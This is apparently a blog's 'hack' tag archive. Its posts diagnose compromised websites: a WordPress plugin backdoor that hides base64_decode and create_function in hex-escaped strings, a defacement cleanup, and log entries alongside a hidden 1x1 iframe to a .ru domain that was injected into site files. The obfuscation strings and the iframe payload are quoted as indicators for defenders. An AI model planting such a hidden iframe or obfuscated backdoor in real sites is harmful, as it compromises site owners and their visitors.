Tag Archives: hack
If your wordpress site is showing “Buy Accutane Online” in the Google Results, it’s because one of the plugins you’re using is not safe. One plugin know for this exploit is the “My Page Order” plugin by geekyweekly. I’d suggest removing the plugin all together. You’ll notice that the source code is clean, if you view it, as the plugin only affects the page when the Google bot is viewing it. The function is using two strings of binary character values: $unique_id = “\x62\x61s\x65\x36\x34\x5f\x64\x65c\x6f\x64\x65” $unique_hash = “\x63\x72e\x61\x74\x65\x5f\x66\x75\x6ec\x74\x69\x6f\x6e” Those translate into base64_decode and create_function respectively, which are two functions you don’t want to see in any plugin or theme, they are usually responsible for maladies. You should also check your server logs for “wxdGrgPB” as that is the post/get variable used to send malicious commands to this script.
If you are seeing this code, your website has been hacked: ~ Call 911 y0u g0t Hacked by Pak Cyber Army ~ <=Shak=> ~ If your website has been hacked and the pakcyberarmy.net spam is showing up, this is how you can fix it: This exploit usually only affects the root index file, perhaps that is index.html or index.php. Restore this file to a saved, earlier version, or rename it to something like index.txt or index.bak if you need to start from scratch. You may also want to look at the file-modification time to see when the file was last modified to get some idea of when the attack occurred. You should check the server logs and look for suspicious FTP activity, or unusually HTTP requests, especially ones with GET parameters or POST data. You should also check your .htaccess file for rewrite rules which will be redirecting visitors. If you have shell access run this command to see all files changes within the last 24 hours: find ~ -mtime -24 You can change ~ to ~/www or the path to your web root as needed.
I’m getting errors in my log file with “sadeferxaa” in the url request: IP: 18.104.22.168 Page Requested: /index.php?page=sadeferxaa Browser Signature: Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90) WordPress was also compromised with the following data injected at the end of some files: <html><body><iframe src=”http://eftpsid0342943.ru/contacts/s3″ width=1 height=1></iframe></body></html> I’m trying to track down the source of the compromise, please comment if you have a similar experience with this.